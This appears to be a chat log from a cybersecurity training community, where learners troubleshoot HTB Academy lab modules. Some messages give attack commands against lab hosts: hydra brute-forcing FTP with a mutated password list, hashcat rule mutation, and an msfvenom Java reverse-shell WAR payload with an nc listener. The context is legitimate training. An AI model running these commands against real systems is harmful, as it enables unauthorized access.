I've tried running the SilkETW in conjunction with SeatBelt as the module shows, and when I open the etw json file, there's nothing ever there that corresponds with what the question is looking for.

Search for ManagedInteropMethodName in this json File

Yep, I've done that and I can't find anything that conforms to what the question is looking for. I just respawned the instance to see if I might have misconfigured something.

Hello Everyone, I'm new to the crew (cyber). Going through information security skill path on HTB !

Getting an error on Attacking DNS from Attacking Common Services module

I already used subbrute, but the dig command is not working.

the @ should be the ns

there was only hr.inlanefreight.htb

is inlanefreight.htb the nameserver then?

I have it backwards?

do you think hr will be a nameserver?

guys any hint in this im stuck here Submit the number of all "A" records from all zones as the answer. footprinting module

I figured it out, my command was backwards

nothing more annoying then being halfway through a skills assessment and the Pwnbox instance running out of life sigh

hi I'm still on the last exercise of the intro to nmap module. I started taking notes of the whole module again from scratch but I am wondering if I should just look at a walkthrough of the module or read through the whole module again straight through. I watched an entire YouTube playlist of Nmap by hackersploit so its just a thought.

what do you think?

I have been on the last exercise of the Nmap module for weeks and forgotten a lot of what I have learned.

but I don't want to cheat because I want to learn

is there a walkthrough by section so I can relearn everything from previous sections in YouTube video and just skip the walkthrough for the last section?

is it a bad idea to do a walkthrough of it?

The target IP is the nameserver

mutated the password from the hint and tried kira but cant get in

any tips?

yes, try brute forcing a different service not ssh

hydra -l kira -P mut_password.list ftp://10.129.43.39

i mutated it with best64, just renamed it to something else

mutate it with the given resources

Also, I believe there was a hint about the password just mutate the hint or words related to it, it will decrease the time taken to brute.

Use the rule given in the resources to mutate that list the password has a 0 in it

hashcat --force password.list -r custom.rule --stdout > mut_password.list

i am dumb lol

thanks!

Your not dumb, we all deviate from the resources/modules from time to time. Every time I've been stuck or hit a roadblock, the answers are always in the materials

oh ok

And make sure you write all passwords you find down because iirc there are a few credential reuse questions 😉

Are you talking about the Hard Lab?

hi

anybody here?

i cant unlock modules

am I only one with this problem here

: )

do i need to brute force the hashes manually for Passwd, Shadow & Opasswd?

can anyone tell me if this is the correct app for the skills assessment in ADVANCED XSS AND CSRF? I have had two different apps load at different times

Use the mutated password list

This module makes heavy use of the mutated list

Morning, bit lost on Pivoting, Tunneling, and Port Forwarding module Skills Assessment.
Stuck on last question in finding DC.
I'm in host ||PIVOTWIN10 Ip 172.16.6.25||.
I also see network ||172.16.10|| where I have two IPs ||172.16.10.5 ||and|| 172.16.10.25||. Can' t connect to neither of them. What am I missing?

Hi Everyone got a hashcat question here hope i can get some help iam trying to crack a hash with hashcat but i cannot cat the outputfile whatsoever what am i doing wrong ?

Hi, Trying to establish a rdp(xfreerdp) to foothold box. however, session keeps dropping.
[11:04:26:999] [3504:3505] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[11:04:26:999] [3504:3505] [ERROR][com.freerdp.core] - failed to connect to 10.129.204.126

Any solution please.

try to add /display-resolution in the end of your command like this xfreerdp /v:targetip /u:user /p:1231 /dynamic-resolution

Still getting the same error. (It's from the pwnbox)

reset target?

I'm experiencing the issue from yesterday. Did reset it. Will give it another go

tell me if that helped 🙂

Still getting the same error.
[11:23:50:788] [4281:4282] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[11:23:50:788] [4281:4282] [ERROR][com.freerdp.core] - failed to connect to 10.129.106.209

hmm do you have own distro set up )

?

do you have privileges to RDP? also what command are you using

for sure it has to be the special characters on password

Yes. I have tried from there as well. the same error is thrown

Yes. xfreerdp

maybe yes

try with ''

password has $ or ! use single quotes

Double quotes worked! hope the connection stays now.

Single quotes was throwing the error.

magic 😄

double quotes with $ wont work.

That didn't long enough. Dropped out again.
[11:30:46:666] [4398:4399] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[11:30:46:666] [4398:4399] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[11:30:46:666] [4398:4399] [INFO][com.freerdp.client.common] - Network disconnect!

fix your internet

True.

Just checked on that, there isn't any packet loss. 50 up and 20 down.

Can you add a bit more context as to what you've done near to pivoting on the pivot machine and how you're connecting to other hosts, also what error do you get.

did you try it wih the resolution flag ?

Yes. i haven't taken it out

Internet is stable, as my VNC session doesn't drop. However, only the rdp session keeps droping.

I create dynamic port forwarding on 1st host using ssh.
Then I RDP with ||mlefay ||on ||172.16.5.35||. Got creds for ||vfrank ||and next machine is ||172.16.5.35||.
From there I can see|| 172.16.10.x|| network.
I RDP directly to ||172.16.10.5|| and pivot via ||SocksOverRDP||. Host is not reachable.

Can somebody help me a little bit with Attacking Thick Client Application.Please

hey guys i m kind of stuck at shells and payloads modules live engagement host no. 1 i m not able to get reverse shell after uploading the shell and when accessing it , it throws 400, 404 error

Hi, Could you please provide the command used to establish the rdp connection to the foothold machine. It keeps dropping for me.

could you paste the command you use here ?

xfreerdp /v:10.129.106.209 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution

i used your command and got in directly without a prob and the connection is stable

try to use your own distro

I get the same error on my own distro as well. I shall try on a different network later.

regenerate vpn

also try TCP

maybe there is a vpn interfiering ?

Yeah sure.

I don't use any 3rd party vpn

I shall try with a TCP vpn.

yeah thats most stable one prop

That made the connection stable.
Thanks @sly dome @unreal granite

np

hello

Hi

so I was looking through some of the pfSense documentation and stumbled upon the Lawrence Tech services's web page where they explain the recent change (a few months) features of pfSense CE and addtion of pfSense Plus
https://forums.lawrencesystems.com/t/differences-in-pfsense-plus-vs-pfsense-ce-in-july-2023/18078
The key difference they have in this link, I understand some of the stuff they are comparing to but will it affect me in any way for which I would have to buy its plus package? Or should I shift to OPNsense which is a fork of pfSense.
I need someone to explain the key differences mentioned in this link so I can make a clear decision on what product I should stick to.

ffs I cant send the key message here

from Boot Environments to IPsec Export: Windows Powershell

hey guy, I'm stuck on "Attacking Thick Client Applications"

can some one please help?

damn okay

This has nothing to do with htb academy

Look up walk-through for the box "Fatty"

Its an out of syllabus question

Tell me when you figure out

Then it's not gonna get answered here read #welcome on how to access more of the server

@fathom pendant can you plz help me with shell and payloads modules live engagement section host1

@sly kelp

Is that the tomcat one? Creds are on the jump host desktop

???

Sorry it looks like it replied to the wrong thing

actually i am having problem with the payload acess

@sly kelp

when i acess it from the browser it throws the error 400

I don't think you need to include the .war extension in the url

okay let me try

If you go to tomcat manager you'll be able to click it to navigate to it as well

still not able to connect

Did you use the right arguments in msfvenom?

can i dm you the steps i took

No

Iirc the cheatsheet has the format

Are you running your listener?

i used msfvenom -p java/shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war

And that's the lhost ip of the jump host?

i didnt got you what you are trying to ask

Is that 172 address the ip of the attack host?

yes

yes and also ran a listner with nc -lvp 443 -s 172.16.1.5

You don't need to specify the source

I dont recall it being that complicated once I accessed the page

And you're sure you're navigating to the right page for the file? Like I said the manager let's you go to it correctly

http://status.inlanefreight.local/files/shell the file i uploaded is shell.war

Also you can replace the direct numbers with IP and PORT

So it's not spoiling

Shouldn't it be java/jsp_shell_reverse_tcp

I knew something didn't look quite right from your msfvenom command

Hello I have a problem with ffuf

Pls help me

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

When I put ffuf with -w and -u flags It returns me Errors : number (instead of 0) and it doesn’t return the files

It would be nice to see your command my guy

Ok

So we can actually tell you what you did wrong

If you're trying to upload a photo, you can't. You need to link your htb main account to discord ( #welcome )

ffuf -w /opt/useful/Seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://94.237.54.59:39423/blog/indexFUZZ

It doesn’t work in phone

Why aren't you doing index.fuzz

To recup all files that finsh with .word

Like .html

.php

It’s the module that show me this command

I didn’t use it from my knowledges